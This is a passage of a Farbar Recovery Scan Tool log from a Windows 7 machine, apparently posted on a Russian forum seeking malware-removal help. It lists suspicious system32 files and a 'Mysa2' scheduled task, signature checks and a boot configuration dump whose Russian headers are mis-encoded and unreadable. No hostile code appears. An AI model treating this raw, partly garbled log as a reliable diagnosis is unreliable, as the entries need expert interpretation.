2018-01-18 23:20 - 2017-07-25 22:40 - 000000000 ____D C:\Kaspersky Rescue Disk 10.0
2018-01-16 16:38 - 2017-07-27 10:47 - 000000078 _____ C:\Windows\system32\ps
2018-01-16 16:38 - 2017-06-29 11:20 - 000000076 _____ C:\Windows\system32\p
2018-01-16 16:38 - 2017-06-29 11:20 - 000000060 _____ C:\Windows\system32\s
2018-01-16 13:18 - 2017-06-28 22:38 - 000003424 _____ C:\Windows\System32\Tasks\Mysa2
==================== Files in the root of some directories =======
2016-10-22 15:36 - 2018-01-29 02:20 - 000000466 _____ () C:\Users\Markus\AppData\Roaming\prio.ini
2013-09-28 18:57 - 2018-02-07 11:13 - 000014243 _____ () C:\Users\Markus\AppData\Roaming\PStrip.bak
2013-09-28 18:57 - 2018-02-07 02:58 - 000014243 _____ () C:\Users\Markus\AppData\Roaming\PStrip.bk!
2013-09-28 18:59 - 2018-02-06 10:31 - 000014243 _____ () C:\Users\Markus\AppData\Roaming\PStrip.bko
2013-09-28 16:40 - 2018-02-07 13:14 - 000014243 _____ () C:\Users\Markus\AppData\Roaming\PStrip.ini
2013-01-20 21:28 - 2014-01-13 05:06 - 000037888 _____ () C:\Users\Markus\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2013-01-30 04:28 - 2016-11-29 16:33 - 000000075 _____ () C:\Users\Markus\AppData\Local\fusioncache.dat
2017-07-12 10:11 - 2017-07-12 10:11 - 000000523 _____ () C:\Users\Markus\AppData\Local\Nox_crash.log
2013-10-11 16:10 - 2013-10-11 16:10 - 000007606 _____ () C:\Users\Markus\AppData\Local\Resmon.ResmonCfg
2017-10-26 22:11 - 2017-10-26 22:11 - 000000000 _____ () C:\Users\Markus\AppData\Local\{5579B7AA-4F5C-40CA-9063-09B36CF11597}
==================== Bamital & volsnap ======================
(There is no automatic fix for files that do not pass verification.)
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
==================== BCD ================================
��ᯥ��� ����㧪� Windows
--------------------
�����䨪��� {bootmgr}
device partition=\Device\HarddiskVolume1
description Windows Boot Manager
locale ru-RU
inherit {globalsettings}
default {current}
resumeobject {e45e6547-4852-11e2-a9a9-85e3a09781bf}
displayorder {current}
toolsdisplayorder {memdiag}
timeout 30
����㧪� Windows
-------------------
�����䨪��� {18b27302-3b02-11e2-a37e-d7ac3651fabf}
device ramdisk=[C:]\Recovery\18b27302-3b02-11e2-a37e-d7ac3651fabf\Winre.wim,{18b27303-3b02-11e2-a37e-d7ac3651fabf}
path \windows\system32\winload.exe
description Windows Recovery Environment
inherit {bootloadersettings}
osdevice ramdisk=[C:]\Recovery\18b27302-3b02-11e2-a37e-d7ac3651fabf\Winre.wim,{18b27303-3b02-11e2-a37e-d7ac3651fabf}
systemroot \windows
nx OptIn
winpe Yes
����㧪� Windows
-------------------
�����䨪��� {current}
device partition=C:
path \Windows\system32\winload.exe
description Windows 7
locale ru-RU
inherit {bootloadersettings}
recoverysequence {e45e6549-4852-11e2-a9a9-85e3a09781bf}
recoveryenabled Yes
osdevice partition=C:
systemroot \Windows
resumeobject {e45e6547-4852-11e2-a9a9-85e3a09781bf}
nx OptOut
usefirmwarepcisettings No
����㧪� Windows
-------------------
�����䨪��� {e45e6549-4852-11e2-a9a9-85e3a09781bf}
device ramdisk=[C:]\Recovery\e45e6549-4852-11e2-a9a9-85e3a09781bf\Winre.wim,{e45e654a-4852-11e2-a9a9-85e3a09781bf}
path \windows\system32\winload.exe
description Windows Recovery Environment
inherit {bootloadersettings}
osdevice ramdisk=[C:]\Recovery\e45e6549-4852-11e2-a9a9-85e3a09781bf\Winre.wim,{e45e654a-4852-11e2-a9a9-85e3a09781bf}
systemroot \windows
nx OptIn
winpe Yes
����㧪� Windows
-------------------
�����䨪��� {f25ad1d0-6ae8-11e1-8359-b1e7f913d2b9}
device ramdisk=[C:]\Recovery\f25ad1d0-6ae8-11e1-8359-b1e7f913d2b9\Winre.wim,{f25ad1d1-6ae8-11e1-8359-b1e7f913d2b9}
path \windows\system32\winload.exe
description Windows Recovery Environment
inherit {bootloadersettings}
osdevice ramdisk=[C:]\Recovery\f25ad1d0-6ae8-11e1-8359-b1e7f913d2b9\Winre.wim,{f25ad1d1-6ae8-11e1-8359-b1e7f913d2b9}
systemroot \windows
nx OptIn
winpe Yes
��室 �� ०��� ����ୠ樨
--------------------------
�����䨪��� {e45e6547-4852-11e2-a9a9-85e3a09781bf}
device partition=C:
path \Windows\system32\winresume.exe
description Windows Resume Application
locale ru-RU
inherit {resumeloadersettings}
filedevice partition=C:
filepath \hiberfil.sys
debugoptionenabled No
�஢�ઠ ����� Windows
---------------------
�����䨪��� {memdiag}
device partition=\Device\HarddiskVolume1
path \boot\memtest.exe
description �������⨪� �����
locale ru-RU
inherit {globalsettings}
badmemoryaccess Yes
��ࠬ���� EMS
-------------
�����䨪��� {emssettings}
bootems Yes
��ࠬ���� �⫠�稪�
-------------------
�����䨪��� {dbgsettings}
debugtype Serial
debugport 1
baudrate 115200
��䥪�� ���
-----------
�����䨪��� {badmemory}
�������� ��ࠬ����
--------------------
�����䨪��� {globalsettings}
inherit {dbgsettings}
{emssettings}
{badmemory}
��ࠬ���� �����稪�
--------------------
�����䨪��� {bootloadersettings}
inherit {globalsettings}
{hypervisorsettings}
��ࠬ���� ����ࢨ���
-------------------
�����䨪��� {hypervisorsettings}
hypervisordebugtype Serial
hypervisordebugport 1
hypervisorbaudrate 115200
��ࠬ���� �����稪� ����⠭�������
-----------------------------------
�����䨪��� {resumeloadersettings}
inherit {globalsettings}
��ࠬ���� ���ன��
-------------------
�����䨪��� {18b27303-3b02-11e2-a37e-d7ac3651fabf}
description Ramdisk Options
ramdisksdidevice partition=C:
ramdisksdipath \Recovery\18b27302-3b02-11e2-a37e-d7ac3651fabf\boot.sdi
��ࠬ���� ���ன��
-------------------
�����䨪��� {e45e654a-4852-11e2-a9a9-85e3a09781bf}
description Ramdisk Options
ramdisksdidevice partition=C:
ramdisksdipath \Recovery\e45e6549-4852-11e2-a9a9-85e3a09781bf\boot.sdi
��ࠬ���� ���ன��
-------------------
�����䨪��� {f25ad1d1-6ae8-11e1-8359-b1e7f913d2b9}
description Ramdisk Options
ramdisksdidevice partition=C:
ramdisksdipath \Recovery\f25ad1d0-6ae8-11e1-8359-b1e7f913d2b9\boot.sdi
LastRegBack: 2018-01-31 15:26
==================== End of FRST.txt ============================ |
Всего записей: 109 | Зарегистр. 14-03-2011 | Отправлено: 17:25 07-02-2018 | Исправлено: markusMj, 17:31 07-02-2018 |
|
